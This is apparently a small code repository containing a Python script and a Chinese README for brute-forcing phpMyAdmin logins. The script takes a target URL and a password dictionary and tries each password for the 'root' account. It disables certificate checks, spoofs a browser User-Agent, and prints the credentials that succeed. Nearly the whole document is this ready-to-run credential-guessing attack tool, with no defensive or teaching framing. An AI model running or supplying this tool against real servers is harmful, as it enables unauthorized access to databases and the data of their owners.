├── README.md ├── password.txt └── phpmyadmin.py /README.md: -------------------------------------------------------------------------------- 1 | # phpmyadmin_Weak-password-blasting 2 | phpmyadmin弱口令爆破脚本 3 | ![image](https://github.com/user-attachments/assets/05b40e50-0a41-4788-9ccb-83e47729cc08) 4 | -r 添加自定义爆破字典 5 | -------------------------------------------------------------------------------- /phpmyadmin.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import argparse 3 | 4 | 5 | def phpmyadminFuzz(url, username, password_list): 6 | url = url.rstrip('/') + '/phpmyadmin/index.php' # Ensure URL is well-formed 7 | for i in username: # Iterate through usernames 8 | for j in password_list: # Iterate through passwords 9 | data = { 10 | "pma_username": i, 11 | "pma_password": j, 12 | "server": "1", 13 | } 14 | try: 15 | headers = { 16 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0' 17 | } 18 | r = requests.post(url, headers=headers, data=data, verify=False, allow_redirects=True, timeout=10) 19 | if r.status_code == 200 and 'phpMyAdmin phpStudy 2014' in r.text: 20 | print(f'\033[32m[+] {url} Login Success! username: {i} & password: {j}\033[0m') 21 | return # Exit after successful login 22 | else: 23 | print(f'\033[31m[-] {url} Login Failed for username: {i} & password: {j}\033[0m') 24 | except requests.exceptions.RequestException as e: 25 | print(f'[!] {url} is timeout or error occurred: {e}') 26 | break # Exit loop on error 27 | 28 | 29 | def load_passwords(file_path): 30 | with open(file_path, 'r') as file: 31 | return [line.strip() for line in file.readlines()] 32 | 33 | 34 | if __name__ == "__main__": 35 | parser = argparse.ArgumentParser(description='Brute force phpMyAdmin login') 36 | parser.add_argument('url', help='URL of the phpMyAdmin instance') 37 | parser.add_argument('-r', '--passwords', required=True, help='Path to the password dictionary file') 38 | 39 | args = parser.parse_args() 40 | 41 | # Default username list 42 | username = ['root'] 43 | # Load passwords from the specified file 44 | password_list = load_passwords(args.passwords) 45 | 46 | phpmyadminFuzz(args.url, username, password_list) 47 | 48 | 49 | 50 | 51 | 52 | --------------------------------------------------------------------------------